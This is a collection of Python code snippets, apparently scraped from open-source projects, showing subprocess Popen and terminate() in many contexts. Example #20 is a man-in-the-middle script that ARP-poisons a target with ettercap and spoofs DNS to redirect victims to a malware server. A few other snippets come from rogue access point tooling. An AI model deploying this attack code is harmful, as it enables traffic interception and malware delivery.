示例#1
0
文件: svn.py 项目: jmesmon/layman
 def check_upgrade(self, target):
     '''Code to check the installed svn version and
     run "svn upgrade" if needed.'''
     file_to_run = _resolve_command(self.command(), self.output.error)[1]
     args = file_to_run + ' -q --version'
     pipe = Popen(args, shell=True, stdout=PIPE)
     if pipe:
         self.output.debug("SVN: check_upgrade()... have a valid pipe", 4)
         version = pipe.stdout.readline().strip('\n')
         self.output.debug("SVN: check_upgrade()... svn version found: %s"
             % version, 4)
         pipe.terminate()
         if version >= '1.7.0':
             self.output.debug("SVN: check_upgrade()... svn upgrade maybe",
                 4)
             _path = path([target,'.svn/wc.db'])
             if not os.path.exists(_path):
                 self.output.info("An svn upgrade needs to be run...",
                     2)
                 args = ["upgrade"]
                 return self.run_command(self.command(), args,
                     cwd=target, cmd="svn upgrade")
             return
     else:
         return
示例#2
0
    def abaqusProcess(self):

        cleardir('.', FILEPAT)
        if os.path.exists(ODBFILE):
            os.remove(ODBFILE)
        if os.path.exists(TARGETFILE):
            os.remove(TARGETFILE)
        self.optlogger.info('INPUT THE TEMPERATURE OF THE THREAD IS %s', self.currTem)
        self.optlogger.info('START COMPUTING THE PRESTRESS .....')
        self.changeINP(INPFILE)
        createOdb = Popen(self._scommmand_inp, shell=True)
        self.pause(400)
        self.optlogger.info('TERMINATE PROGRESS: %s', createOdb.pid)
        createOdb.terminate()
        fetchOdb = Popen(self._scommand_odb, shell=True)
        self.optlogger.info('FETCH PRESTRESS FROM DATABASE...')
        sleep(5)
        print('COMPLECATED!')
        self.optlogger.info('TERMINATE PROGRESS: %s', fetchOdb.pid)
        fetchOdb.terminate()
        with open(TARGETFILE, 'r+') as f:
            f_list = f.readlines()
            target = f_list[self._targetno - 1]
        print(target)
        outPres = float(target.split(': ')[-1])
        self.optlogger.info('THE OUTPUT OF THE PRESTRESS IS %s', outPres)
        return outPres
示例#3
0
 def __call__(self, cmd_name, cmd, args=(), cwd=None):
     # Mqke log files
     if cmd_name in self._names:
         raise ValueError('Command name {0} not unique'.format(cmd_name))
     self._names.append(cmd_name)
     if cwd is None:
         cwd = self.working_path
     cmd_out_path = pjoin(self.log_path, cmd_name)
     stdout_log = open(cmd_out_path + '.stdout', 'wt')
     stderr_log = open(cmd_out_path + '.stderr', 'wt')
     try:
         # Start subprocess
         cmd_str = self.cmd_str_maker(cmd, args)
         proc = Popen(cmd_str,
                     cwd = cwd,
                     stdout = stdout_log,
                     stderr = stderr_log,
                     shell = NEED_SHELL)
         # Execute
         retcode = proc.wait()
     finally:
         if proc.poll() is None: # In case we get killed
             proc.terminate()
         stdout_log.close()
         stderr_log.close()
     return retcode
示例#4
0
class ProcessHostapd(QThread):
    statusAP_connected = pyqtSignal(object)
    def __init__(self,cmd):
        QThread.__init__(self)
        self.cmd = cmd

    def run(self):
        print 'Starting Thread:' + self.objectName()
        self.makeLogger()
        self.process = Popen(self.cmd,stdout=PIPE,stderr=STDOUT)
        for line in iter(self.process.stdout.readline, b''):
            #self.log_hostapd.info(line.rstrip())
            if self.objectName() == 'hostapd':
                if 'AP-STA-DISCONNECTED' in line.rstrip() or 'inactivity (timer DEAUTH/REMOVE)' in line.rstrip():
                    self.statusAP_connected.emit(line.split()[2])

    def makeLogger(self):
        setup_logger('hostapd', './Logs/AccessPoint/requestAP.log')
        self.log_hostapd = logging.getLogger('hostapd')

    def stop(self):
        print 'Stop thread:' + self.objectName()
        if self.process is not None:
            self.process.terminate()
            self.process = None
示例#5
0
 def outputPrestress(self):
     cleardir('.', FILEPAT)
     if os.path.exists(ODBFILE):
         os.remove(ODBFILE)
     if os.path.exists(TARGETFILE):
         os.remove(TARGETFILE)
     self.optlogger.info('INPUT THE TEMPERATURE OF THE THREAD IS %s', self.currentTems)
     self.optlogger.info('START COMPUTING THE PRESTRESS .....')
     file_change(INPFILE, self._linenos, self.currentTems)
     createOdb = Popen(self._command_inp, shell=True)
     self.pause(400)
     self.optlogger.info('TERMINATE PROGRESS: %s', createOdb.pid)
     createOdb.terminate()
     fetchOdb = Popen(self._command_odb, shell=True)
     self.optlogger.info('FETCH PRESTRESS FROM DATABASE...')
     sleep(5)
     print('COMPLECATED!')
     self.optlogger.info('TERMINATE PROGRESS: %s', fetchOdb.pid)
     fetchOdb.terminate()
     with open(TARGETFILE, 'r+') as f:
         f_list = f.readlines()
         target = f_list[self._targetno-1]
     print(target)
     pat = re.compile(r'\[(.*?)\]', re.S)
     target_str = pat.search(target).groups()[0]
     outPrestress = [float(item)
                     for item in target_str.split(', ')]
     self.optlogger.info('THE OUTPUT OF MODEL IS %s', outPrestress)
     return outPrestress
示例#6
0
文件: run_tests.py 项目: flyx/gps-osx
def invoke(argv, valgrind=False):
  """Execute a process.

  Executes a new process using the given ARGV and returns a tuple containing
  the process exit code, standard output and error output.
  """

  ecode = None
  (stdout, stderr) = (None, None)
  if valgrind:
    argv = ['valgrind', '--leak-check=full', '--error-exitcode=1'] + argv
  # Runs the process.
  process = Popen(argv, stdout=PIPE, stderr=PIPE)
  # Wait for completion or for timeout.
  start = time.time()
  while time.time() - start < TIMEOUT:
    ecode = process.poll()
    if ecode is not None:
      break
    time.sleep(0.05)
  if ecode is not None:
    (stdout, stderr) = process.communicate()
  else:
    # The process has timed out, so we kill it.
    process.terminate()
  # ECODE is None if the process timed out.
  return (ecode, stdout, stderr)
示例#7
0
    def train(self, corpus, time_slices, mode='fit', model='fixed'):
        """
        Train DTM model using specified corpus and time slices.

        'mode' controls the mode of the mode: 'fit' is for training, 'time' for
        analyzing documents through time according to a DTM, basically a held out set.

        'model' controls the coice of model. 'fixed' is for DIM and 'dtm' for DTM.

        """
        self.convert_input(corpus, time_slices)

        arguments = "--ntopics={p0} --model={mofrl}  --mode={p1} --initialize_lda={p2} --corpus_prefix={p3} --outname={p4} --alpha={p5}".format(
            p0=self.num_topics, mofrl=model, p1=mode, p2=self.initialize_lda, p3=self.fcorpus(), p4=self.foutname(), p5=self.alpha)

        params = "--lda_max_em_iter={p0} --lda_sequence_min_iter={p1}  --lda_sequence_max_iter={p2} --top_chain_var={p3} --rng_seed={p4} ".format(
            p0=self.lda_max_em_iter, p1=self.lda_sequence_min_iter, p2=self.lda_sequence_max_iter, p3=self.top_chain_var, p4=self.rng_seed)

        arguments = arguments + " " + params
        logger.info("training DTM with args %s" % arguments)
        try:
            p = Popen([self.dtm_path] + arguments.split(), stdout=PIPE, stderr=PIPE)
            p.communicate()
        except KeyboardInterrupt:
            p.terminate()
        self.em_steps = np.loadtxt(self.fem_steps())
        self.init_alpha = np.loadtxt(self.finit_alpha())
        self.init_beta = np.loadtxt(self.finit_beta())
        self.init_ss = np.loadtxt(self.flda_ss())

        self.lhood_ = np.loadtxt(self.fout_liklihoods())

        # document-topic proportions
        self.gamma_ = np.loadtxt(self.fout_gamma())
        # cast to correct shape, gamme[5,10] is the proprtion of the 10th topic
        # in doc 5
        self.gamma_.shape = (self.lencorpus, self.num_topics)
        # normalize proportions
        self.gamma_ /= self.gamma_.sum(axis=1)[:, np.newaxis]

        self.lambda_ = np.zeros((self.num_topics, self.num_terms * len(self.time_slices)))
        self.obs_ = np.zeros((self.num_topics, self.num_terms * len(self.time_slices)))

        for t in range(self.num_topics):
                topic = "%03d" % t
                self.lambda_[t, :] = np.loadtxt(self.fout_prob().format(i=topic))
                self.obs_[t, :] = np.loadtxt(self.fout_observations().format(i=topic))
        # cast to correct shape, lambda[5,10,0] is the proportion of the 10th
        # topic in doc 5 at time 0
        self.lambda_.shape = (self.num_topics, self.num_terms, len(self.time_slices))
        self.obs_.shape = (self.num_topics, self.num_terms, len(self.time_slices))
        # extract document influence on topics for each time slice
        # influences_time[0] , influences at time 0
        if model == 'fixed':
            for k, t in enumerate(self.time_slices):
                stamp = "%03d" % k
                influence = np.loadtxt(self.fout_influence().format(i=stamp))
                influence.shape = (t, self.num_topics)
                # influence[2,5] influence of document 2 on topic 5
                self.influences_time.append(influence)
  class Command(object):
    def __init__(self, cmd):
      self.cmd = cmd
      self.process = None
  
    def run(self, timeout):
      def target():
        logfile = None
        if logfile_path != None:
          logfile = open(logfile_path, 'a')
          self.process = Popen(shlex.split(self.cmd), stdout=logfile, stderr=logfile, universal_newlines=True)
        else:
          self.process = Popen(shlex.split(self.cmd), universal_newlines=True)
        result = self.process.wait()
        if logfile != None:
          logfile.write('\r\n')
          logfile.flush()
          logfile.close()
  
      thread = threading.Thread(target=target)
      thread.start()

      result = None
      thread.join(timeout)
      if thread.is_alive():
        self.process.terminate()
        thread.join()
      else:
        result = self.process.returncode

      return result
    def testBasic(self):
        iface = self.tap.name
        record = PacketRecord()

        # start capture
        process = Popen([APP, iface, CAPTURE_FILE], stdout=DEV_NULL, stderr=DEV_NULL)

        # send packets
        for i in range(PACKET_COUNT):
            packet = IP(dst="www.google.com")/ICMP()
            sendp(packet, iface=iface, verbose=False)
            record.add_sent(packet)

        # wait for stragglers
        time.sleep(1)

        # stop capture
        process.terminate()
        # hack: send one more packet to make sure capture closes immediately
        sendp(IP(), iface=iface, verbose=False)
        process.poll()

        # verify capture file
        for packet in rdpcap(CAPTURE_FILE):
            record.add_received(packet)
        self.assertTrue(record.verify())
示例#10
0
class Procserver:
    '''
    Launch a python process that reads from stdin and writes to stdout as a
    service.
    '''
    def __init__(self, proc_args):
        '''
        Initializes the process using its arguments.
        '''
        self.proc = Popen(proc_args, stdout=PIPE, stdin=PIPE)

    def __del__(self):
        '''
        Terminates the process.
        '''
        self.proc.terminate()

    def communicate(self, string):
        '''
        Writes string to the process's stdin and blocks till the process writes
        to its stdout. Returns the contents from the process's stdout.
        '''
        self.proc.stdin.write(string.strip()+'\n\n')
        out = ''
        while True:
            line = self.proc.stdout.readline()
            if not line.strip(): break
            out += line
        return out.strip()
    def testLocal(self):
        # note: ignore_zero_padding necessary until '0' padding simulation bug is resolved
        record = PacketRecord(ignore_zero_padding=True)

        # start capture
        process = Popen([CLIENT_APP, DFE_IP, DFE_NETMASK, '-l', CAPTURE_FILE], env=self.env, \
            stdout=DEV_NULL, stderr=DEV_NULL)
        self.processes.append(process)

        # send packets
        for i in range(PACKET_COUNT):
            packet = IP(dst='127.0.0.2')/ICMP()
            sendp(packet, iface=self.iface, verbose=False)
            record.add_sent(packet)

        # wait for stragglers
        time.sleep(1)

        # make sure still running
        process.poll()
        self.assertTrue(process.returncode == None)

        # stop capture
        process.terminate()
        # hack: send one more packet to make sure capture closes immediately
        sendp(IP(), iface=self.iface, verbose=False)
        process.wait()

        # verify capture CAPTURE_FILE
        for packet in rdpcap(CAPTURE_FILE):
            record.add_received(packet)
        self.assertTrue(record.verify())
示例#12
0
文件: wordish.py 项目: jdb/wordish
class CommandRunner ( object ):
    r""" Implements a python "context manager", when entering the
    context (the *with* block ), creates a shell in a subprocess,
    right before exiting the context (leaving the block or processing
    an exception), the shell is assured to be terminated.

    The call method takes a string meant to contain a shell command
    and send it to the shell which executes it. call ret output of the
    command.

    >>> with CommandRunner() as sh:
    ...    sh("echo coucou")
    ...    sh("a=$((1+1))")
    ...    sh("echo $a")
    ...
    coucou, 0
    0
    2, 0
    """
    separate_stderr = True

    def __enter__( self ):
        if CommandRunner.separate_stderr:
            self.terminator = '\necho "~$ $?" \n' + 'echo "~$ " >&2 \n' 
            self.shell = Popen( "/bin/bash", shell=True, 
                                stdin=PIPE, stdout=PIPE,stderr=PIPE, 
                                universal_newlines=True)
                                
            self.stdout = ShellSessionParser( self.shell.stdout )
            self.stderr = ShellSessionParser( self.shell.stderr ) 
        else:
            self.terminator = '\necho "~$ " \n' 
            self.shell = Popen( "sh", shell=True, 
                                stdin=PIPE, stdout=PIPE, stderr=STDOUT)

            self.stdout = ShellSessionParser( self.shell.stdout )
            self.stderr = None
        return self

    def __call__( self, cmd):
        r"""in it and sends it to the shell via stdin. Then, stdout is
        read until a prompt following a linefeed. The prompt is
        suppressed and the tokens read are joined and returned as
        the"""

        self.shell.stdin.write( cmd + self.terminator )
        return CommandOutput( *self.read_output(), cmd=cmd )
 
    def read_output(self):
        
        out =      self.stdout._takewhile( is_output=True )
        ret = int( self.stdout.tokens.next() )
        err =      self.stderr._takewhile( True 
                       ) if CommandRunner.separate_stderr else None 

        return out,err, ret

    def __exit__( self, *arg):
        self.shell.terminate()
        self.shell.wait()
示例#13
0
 def test_listen(self):
     # Start the listen command with a socket.
     listen_daemon = Popen(self.listen_args, stdout=PIPE, stderr=PIPE)
     # Wait a short while for the socket to be created.
     time.sleep(1)
     # Send command to and receive response from the listen command.
     # (Implicit string concatenation, no summing needed.)
     get_cmd = (b'{ "id": "0", "verb": "get",'
         b' "path": "/routes/route[addr=1.2.3.4]/port" }\n')
     sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
     try:
         sock.connect(SOCKET_PATH)
         sock.sendall(get_cmd)
         resp = str(sock.recv(200), ENC)
     finally:
         sock.close()
     status = json.loads(resp)['status']
     self.assertEqual(status, 'ok')
     # Terminate the listen command.
     listen_daemon.terminate()
     ret_code = listen_daemon.wait()
     if ret_code not in (0, -SIGTERM):
         print('Error terminating daemon:', listen_daemon.args)
         print('Exit code:', ret_code)
         print('STDOUT\n', str(listen_daemon.stdout.read(), ENC))
         print('STDERR\n', str(listen_daemon.stderr.read(), ENC))
     listen_daemon.stdout.close()
     listen_daemon.stderr.close()
     os.unlink(SOCKET_PATH)
示例#14
0
class StanfordAPI:
    """Used to initialize the Stanford POS tagger in servlet mode and then connect to it using a socket"""

    def __init__(self, path_to_model='commons/stanford_pos_tagger/english-bidirectional-distsim.tagger',
                 path_to_jar='commons/stanford_pos_tagger/stanford-postagger.jar', port=5000, buffer_size=4096):
        """Used to initialize the StanfordAPI object with the host, port and buffer"""
        self.host = socket.gethostname()
        self.port = port
        self.buffer = buffer_size
        self.process = Popen(
            ['java', '-mx4g', '-cp', path_to_jar, 'edu.stanford.nlp.tagger.maxent.MaxentTaggerServer',
             '-model', path_to_model, '-port', '5000', '-sentenceDeLimiter', 'newline'])
        time.sleep(5)

    def pos_tag(self, message):
        """Used to send requests to the socket"""
        s = socket.socket()
        s.connect((self.host, self.port))
        if message.strip() == '':
            s.close()
            return []
        s.send(to_ascii(message))
        data = s.recv(self.buffer)
        s.close()
        return [tuple(x.rsplit('_', 1)) for x in str(data).encode('ascii', 'ignore').strip().split()]

    def __del__(self):
        """ Terminating the process """
        self.process.terminate()
示例#15
0
    def execute_sequence(self, sequence):
        def purify_args(args):
            for rm_arg in ['-h, --hardware', ]:
                try:
                    args.remove(rm_arg)
                except ValueError:
                    pass
            for add_arg in ['--no-gui', '--server']:
                args.append(add_arg)
            return args

        while True:
            for command in sequence['sequence']:
                args = split(command['command'])
                cwd = join(realpath(dirname(__file__)), '..', command['dir'])
                args[0] = join(cwd, args[0])
                process = Popen(purify_args(args), cwd=cwd)
                print "Starting "+str(args)
                reason = self.wait(command['timeout'], command['interruptible'], process) # TODO interruptible raw_input in new_thread for 2.7, exec with timeout= for 3
                print "End:", reason
                if reason!='terminated':
                    process.terminate()  # SIGTERM
                    process.send_signal(SIGINT)
                    process.wait() # should poll() and kill() if it does not close?
            if not sequence['infinite']:
                break
示例#16
0
class Query1(unittest.TestCase):

  def setUp(self):
    md.kill_controllers()
    self.ctrl = Popen([md.CONTROLLER_PATH,
                          "--verbosity=DEBUG",
                          "--log=query1.log",
                          "--query1"],stdout=PIPE)
    self.mn = md.MininetRunner(md.TreeTopo(depth=1,fanout=2), self.ctrl)

  def tearDown(self):
    self.mn.destroy()

  def testQuery(self):
    src = self.mn.hosts[0]
    dst = self.mn.hosts[1]
    self.assertEqual(self.mn.ping(src, dst, 1, 5), 0)
    time.sleep(2) # let the query pickup the last pair
    self.ctrl.terminate()
    output = list(self.ctrl.stdout)
    # 2 for initial ARP and 10 from the pings
    m = re.match("Counter is: (\\d+)\n", output[-1])
    numPkts = int(m.group(1))
    if md.is_ipv6_enabled():
      self.assertIn(numPkts, range(18, 25))
    else:
      self.assertEqual(numPkts, 12)
示例#17
0
	def test_command_send(self):
		# START SMTPD
		tfile = tempfile.NamedTemporaryFile()
		tfile_name = tfile.name
		tfile.close()
		p1 = Popen(['./tests/smtp_server.py', tfile_name], stdin=PIPE)
		citems = self.get_testserver_config_scheme()
		proj_dir = self.mm_create_project('Test')
		config = SafeConfigParser()
		config.read(self.config_path)
		for item in citems:
			config.set('Mail', item[0], item[1])
		files = ['mail.txt', 'subject.txt', 'keys.csv', 'attachments.txt']
		self.create_with_sample_files("", proj_dir, files)
		config.write(open(self.config_path, 'w'))
		sys.stdin = x_in = StringIO('\n')
		sys.stdout = x_out = StringIO()
		m = MMailer()
		m.command_send(args=['mmailer', 'send'])
		sys.stdin = sys.__stdin__
		sys.stdout = sys.__stdout__
		p1.terminate()
		p1.wait()
		of = open('tests/samples/send_output.txt','r')
		sto_str = of.read()
		sto = sto_str.decode('UTF-8')
		# exclude first line from compare,
		# because the date changes each test run
		assert x_out.getvalue() == sto,"\n\n[%s]\n\n[%s]" \
				% (sto, x_out.getvalue())
		import filecmp
		assert filecmp.cmp(tfile_name, 'tests/samples/sended.txt')
示例#18
0
def rsync_file_and_update_info(user_id):
    f_pathes = os.listdir(os.path.join("/var/www/u/" , str(user_id), "tmp/"))
    conn = MySQLdb.connect()
    try:
        for f in f_pathes:
            get_info_sql = "".join(["select id from file_table where owner_id = ", str(user_id), " and file_name = ", f])
            o_cur = conn.cursor()
            o_cur.execute(get_info_sql)
            o_res = o_cur.fetch_all()

            target_p = "".join(["slave_node:/home/file_sys/", user_id, "files/"])        
            update_info_sql = "".join(["update file_table set file_path = ", target_p, " where id = ", o_res["id"]])
            pid = os.fork()
            if(0 == pid):
                p_rsync = Popen(["rsync", "-avz", f_pathes + os.sep + f, target_p], stdin = sys.stdin, stdout = sys.stdout, stderr = sys.stderr) 
                #p_rsync.communicate()
                p_rsync.terminate()
                os.kill(os.getpid(), signal.SIGHUP)
            else:
                o_cur.execute(update_info_sql)
                print >> IGNORE, commands.getoutput("rm -fR " + f)  
    except Exception as ex:
        print >> sys.stderr, str(ex) 
    finally:
        conn.close()
示例#19
0
class Process(object):

    def __init__(self, command_line, cwd='.'):
        self.command_line = command_line
        self.cwd = os.path.join(os.path.dirname(__file__), cwd)

    def start(self):
        args = shlex.split(self.command_line)
        self.proc = Popen(args, stdout=PIPE, stderr=STDOUT, cwd=self.cwd, close_fds=ON_POSIX, bufsize=1)
        self.q = Queue()
        t = Thread(target=enqueue_output, args=(self.proc.stdout, self.q))
        t.daemon = True
        t.start()
        return self

    def stop(self):
        self.proc.terminate()

    def read_lines(self, timeout=1000):
        block = True
        get_timeout = min(.1, timeout / 1000.0)
        stop = millis() + timeout
        while millis() < stop:
            try:
                line = self.q.get(block, timeout=get_timeout)
                yield line
            except Empty:
                if not self.proc.poll() is None:
                    break # process died
            block = False # only block first time
def run(target,gateway,malware_server_address):
    #Configuration of /usr/share/ettercap/etter.dns etter.conf
    #On ubuntu 13.04 /etc/ettercap/etter.dns etter.conf
    input_stdin = Popen(split("echo pdns_spoof"), stdout=PIPE)
    ettercap = Popen(split('ettercap -i wlan0 -T -q -P autoadd -M ARP:remote /'''+target+'/ /'+gateway+'/'), stdin=input_stdin.stdout)
    #ip_forward after ettercap may have set it to zero
    #ADD DNS etter.conf TO SERVER IN VIRTUALBOX, VIRTUALBOX INTERNAL NETWORK
    vbox0_address = netifaces.ifaddresses('vboxnet0')[netifaces.AF_INET][0]['addr']
    replaceAll('/etc/ettercap/etter.dns','*.buenosaires.gob.ar A IP','*.buenosaires.gob.ar A '+vbox0_address )
    replaceAll('/etc/ettercap/etter.dns','malware-test.no-ip.info A IP','malware-test.no-ip.info A '+malware_server_address)
    #getOriginalJStoPoison()
    server_address = ('0.0.0.0', 80)
    SocketServer.ForkingTCPServer.allow_reuse_address = True
    httpd = SocketServer.ForkingTCPServer(server_address, BAComoLLegoHTTPRequestHandler)
    #wait for ettercap to initialize and unset ip_forward
    time.sleep(5)
    Popen(split("iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE"), stdout=PIPE).wait()
    Popen(split("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE"), stdout=PIPE).wait()
    Popen(split("sysctl -w net.ipv4.ip_forward=1"), stdout=PIPE).wait()
    #Popen(split("sysctl -p /etc/sysctl.conf"), stdout=PIPE).wait()
    try:
        print('http server is running...')
        httpd.serve_forever()   
    except KeyboardInterrupt:
        print "Exiting"
        if os.path.exists('firstRun'):
            print "removing first run flag"
            os.remove('firstRun')
        replaceAll('/etc/ettercap/etter.dns','*.buenosaires.gob.ar A '+vbox0_address,'*.buenosaires.gob.ar A IP' )
        replaceAll('/etc/ettercap/etter.dns','malware-test.no-ip.info A '+malware_server_address,'malware-test.no-ip.info A IP')
        Popen(split("sudo iptables -t nat -D POSTROUTING -o wlan0 -j MASQUERADE"), stdout=PIPE)
        Popen(split("sudo iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE"), stdout=PIPE)
        ettercap.terminate()
示例#21
0
文件: mtr-web.py 项目: grantc/mtr-web
def mtr_socket(ws):
    request = json.loads(ws.receive())
    print 'received', request
    args = ['mtr', '-p', '-c', '300']
    if request.get('no_dns'):
        args.append('--no-dns')
    if request.get('protocol') == 'TCP':
        args.append('-T')
    elif request.get('protocol') == 'UDP':
        args.append('-u')
    if request.get('version') == '4':
        args.append('-4')
    elif request.get('version') == '6':
        args.append('-6')
    args.append(request.get('hostname'))
    mtr = Popen(args, stdout=PIPE, stderr=STDOUT)
    for line in mtr.stdout:
        try:
            data = [x if i == 1 else int(x) for (i, x) in enumerate(line.split())]
            data[2] = "%.2f%%" % (data[2] / 1000.)
        except ValueError:
            # probably an error from stderr
            data = line
        finally:
            try:
                ws.send(json.dumps(data))
            except:
                mtr.terminate()
                print 'disconnected'
示例#22
0
class NginxServer:

    def __init__(self, nginx_conf, check_url, temp_dir='.'):
        conf_path = path.join(temp_dir, 'nginx.conf')
        write_file(conf_path, nginx_conf)

        self._command = "nginx -c %s" % conf_path
        self._ngx_process = None
        self.check_url = check_url

    def start(self):
        self._ngx_process = Popen(shlex.split(self._command))

        try:  # sanity check
            resp = self._request_check_url()
        except ConnectionError as e:
            self.stop()
            raise e

        if resp.status_code != 200:
            raise IOError("Nginx returned %s for GET %s" % (resp.status_code, self.check_url))

    def stop(self):
        if self._ngx_process is None:
            return
        try:
            self._ngx_process.terminate()
            sleep(0.2)
        finally:
            os.kill(self._ngx_process.pid, 9)

    @retry(ConnectionError, tries=20, delay=0.1)
    def _request_check_url(self):
        return requests.get(self.check_url, verify=False)
示例#23
0
class RunServer(object):

    def __init__(self, instance_name, port):
        self.instance_name = instance_name
        self.port = port
        self.lan_ip = get_lan_ip()
        self.process = None
        self.out = None

    def start(self):
        self.stop()
        cmd = [sys.executable, 'manage_%s.py' % self.instance_name,
               'runserver', '--noreload', '--traceback', '0.0.0.0:%d' % self.port]
        self.process = Popen(cmd)
        sleep(3.0)
        if self.process.poll() is not None:
            self.stop()
            raise RunException(ugettext("Error to start!"))
        self.open_url()

    def open_url(self):
        webbrowser.open_new("http://%(ip)s:%(port)d" %
                            {'ip': self.lan_ip, 'port': self.port})

    def stop(self):
        if self.is_running():
            self.process.terminate()
        self.process = None
        self.out = None

    def is_running(self):
        return (self.process is not None) and (self.process.poll() is None)
class CppSim(ProcessWorkerThread):

    def handle_eval(self, record):
        val = np.nan
        # Continuously check for new outputs from the subprocess
        self.process = Popen([path, array2str(record.params[0])],
                             stdout=PIPE, bufsize=1, universal_newlines=True)

        for line in self.process.stdout:
            try:
                val = float(line.strip())  # Try to parse output
                if val > 250.0:  # Terminate if too large
                    self.process.terminate()
                    self.finish_success(record, 250.0)
                    return
            except ValueError:  # If the output is nonsense we terminate
                logging.warning("Incorrect output")
                self.process.terminate()
                self.finish_cancelled(record)
                return
        self.process.wait()

        rc = self.process.poll()  # Check the return code
        if rc < 0 or np.isnan(val):
            logging.info("WARNING: Incorrect output or crashed evaluation")
            self.finish_cancelled(record)
        else:
            self.finish_success(record, val)
示例#25
0
文件: parser.py 项目: johnliu/chimp
    def collect_events(self):
        on_posix = 'posix' in sys.builtin_module_names

        # Helper function for quickly reading raw output.
        def enqueue_output(out, queue):
            for l in iter(out.readline, ''):
                queue.put(l)

        p = Popen(['adb', 'shell', 'getevent', '-lt'], stdout=PIPE, bufsize=1, close_fds=on_posix)
        t = Thread(target=enqueue_output, args=(p.stdout, self.raw_data_queue))
        t.daemon = True
        t.start()

        try:
            # Process the events in this thread.
            print 'Processing android events from device:'
            self.previous_state = ui.device.dump()
            while True:
                try:
                    line = self.raw_data_queue.get_nowait().strip()
                    self.preprocess_line(line)
                except Empty:
                    # Ignore empty events, we're simply reading too quickly.
                    pass
        except KeyboardInterrupt:
            print 'Finished processing events from device.'
            p.terminate()
示例#26
0
文件: serve.py 项目: defrex/hs-mobile
class OnWriteHandler(pyinotify.ProcessEvent):
    def my_init(self):
        self.start_serve()
        self.last = None

    def start_serve(self):
        self.httpd = Popen(('python', '-m', 'SimpleHTTPServer', str(PORT)),
                           stdout=PIPE, cwd=SERVE)
        print 'Serving at http://0.0.0.0:%i' % PORT

    def stop_serve(self):
        self.httpd.terminate()
        self.httpd.wait()
        self.httpd = None
        print 'Server Terminated'

    def recompile(self):
        self.stop_serve()
        compile.main(args)
        self.start_serve()

    def process_IN_MODIFY(self, event):
        print event.maskname, event.name
        name, ext = event.name.split('.')
        if not (os.path.isfile(os.path.join(event.path, '%s.%s' % (name, 'soy')))
                and ext == 'js'):
            cur = '%s-%s' % (event.path, event.name)
            if self.last == cur:
                self.last = None
            else:
                self.last = cur
                self.recompile()
示例#27
0
class ProcessThread(threading.Thread):
    def __init__(self,cmd):
        threading.Thread.__init__(self)
        self.cmd = cmd
        self.process = None
        self.logger = False

    def run(self):
        print 'Starting Thread:' + self.name
        if self.name == 'Airbase-ng':
            setup_logger('airbase', './Logs/requestAP.log')
            log_airbase = logging.getLogger('airbase')
            log_airbase.info('---[ Start Airbase-ng '+asctime()+']---')
            log_airbase.info('-'*52)
            self.logger = True
        self.process = Popen(self.cmd,stdout=PIPE,stderr=STDOUT)
        for line in iter(self.process.stdout.readline, b''):
            if self.logger:
                if not search(Refactor.getHwAddr(Refactor.get_interfaces()['activated']),
                        str(line.rstrip()).lower()):
                    log_airbase.info(line.rstrip())
            print (line.rstrip())

    def stop(self):
        print 'Stop thread:' + self.name
        if self.process is not None:
            self.process.terminate()
            self.process = None
示例#28
0
class AbstractSubprocessClass(object):
    """
    Simple abstract wrapper class for commands that need to be
    called with Popen and communicate with them
    """

    def __init__(self, runnable, encoding="utf-8"):
        self._runnable = runnable
        self._encoding = encoding
        self._closed = True

    def start(self):
        # print self._runnable
        # print self.options
        self._process = Popen([self._runnable] + self.options, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        self._closed = False

    def stop(self):
        if not self._closed:
            # HACK: communicate() sometimes blocks here
            self._process.terminate()
        self._closed = True

    def __exit__(self, exc_type, exc_value, traceback):
        if not self._closed:
            self.stop()

    def __del__(self):
        if not self._closed:
            self.stop()
示例#29
0
class ProcessThread(threading.Thread):
    def __init__(self,cmd,):
        threading.Thread.__init__(self)
        self.cmd = cmd
        self.iface = None
        self.process = None
        self.logger = False
        self.prompt = True

    def run(self):
        print 'Starting Thread:' + self.name
        if self.name == 'Dns2Proxy':
            setup_logger('dns2proxy', './Logs/AccessPoint/dns2proxy.log')
            log_dns2proxy = logging.getLogger('dns2proxy')
            self.logger = True
        self.process = Popen(self.cmd,stdout=PIPE,stderr=STDOUT)
        for line in iter(self.process.stdout.readline, b''):
            if self.logger:
                if self.name == 'Dns2Proxy':
                    log_dns2proxy.info(line.rstrip())
                    self.prompt = False
            if self.prompt:
                print (line.rstrip())

    def stop(self):
        print 'Stop thread:' + self.name
        if self.process is not None:
            self.process.terminate()
            self.process = None
示例#30
0
def _launch_kernel(cmd):
    """start an embedded kernel in a subprocess, and wait for it to be ready
    
    Returns
    -------
    kernel, kernel_manager: Popen instance and connected KernelManager
    """
    kernel = Popen([sys.executable, '-c', cmd], stdout=PIPE, stderr=PIPE, env=env)
    connection_file = os.path.join(IPYTHONDIR,
                                    'profile_default',
                                    'security',
                                    'kernel-%i.json' % kernel.pid
    )
    # wait for connection file to exist, timeout after 5s
    tic = time.time()
    while not os.path.exists(connection_file) and kernel.poll() is None and time.time() < tic + 5:
        time.sleep(0.1)
    
    if not os.path.exists(connection_file):
        if kernel.poll() is None:
            kernel.terminate()
        raise IOError("Connection file %r never arrived" % connection_file)
    
    if kernel.poll() is not None:
        raise IOError("Kernel failed to start")
    
    km = BlockingKernelManager(connection_file=connection_file)
    km.load_connection_file()
    km.start_channels()
    
    return kernel, km
示例#31
0
def main():
    """
    pipe ffmpeg pre-process to final ffmpeg post-process,
    or play with ffplay
    """
    year = get_date(False).split('-')[0]
    overlay = []

    ff_pre_settings = [
        '-pix_fmt', 'yuv420p', '-r', str(_pre_comp.fps),
        '-c:v', 'mpeg2video', '-intra',
        '-b:v', '{}k'.format(_pre_comp.v_bitrate),
        '-minrate', '{}k'.format(_pre_comp.v_bitrate),
        '-maxrate', '{}k'.format(_pre_comp.v_bitrate),
        '-bufsize', '{}k'.format(_pre_comp.v_bufsize),
        '-c:a', 's302m', '-strict', '-2',
        '-ar', '48000', '-ac', '2',
        '-f', 'mpegts', '-']

    if os.path.isfile(_text.textfile):
        logger.info('Overlay text file: "{}"'.format(_text.textfile))
        overlay = [
            '-vf', ("drawtext=box={}:boxcolor='{}':boxborderw={}"
                    ":fontsize={}:fontcolor={}:fontfile='{}':textfile={}"
                    ":reload=1:x='{}':y='{}'").format(
                        _text.box, _text.boxcolor, _text.boxborderw,
                        _text.fontsize, _text.fontcolor, _text.fontfile,
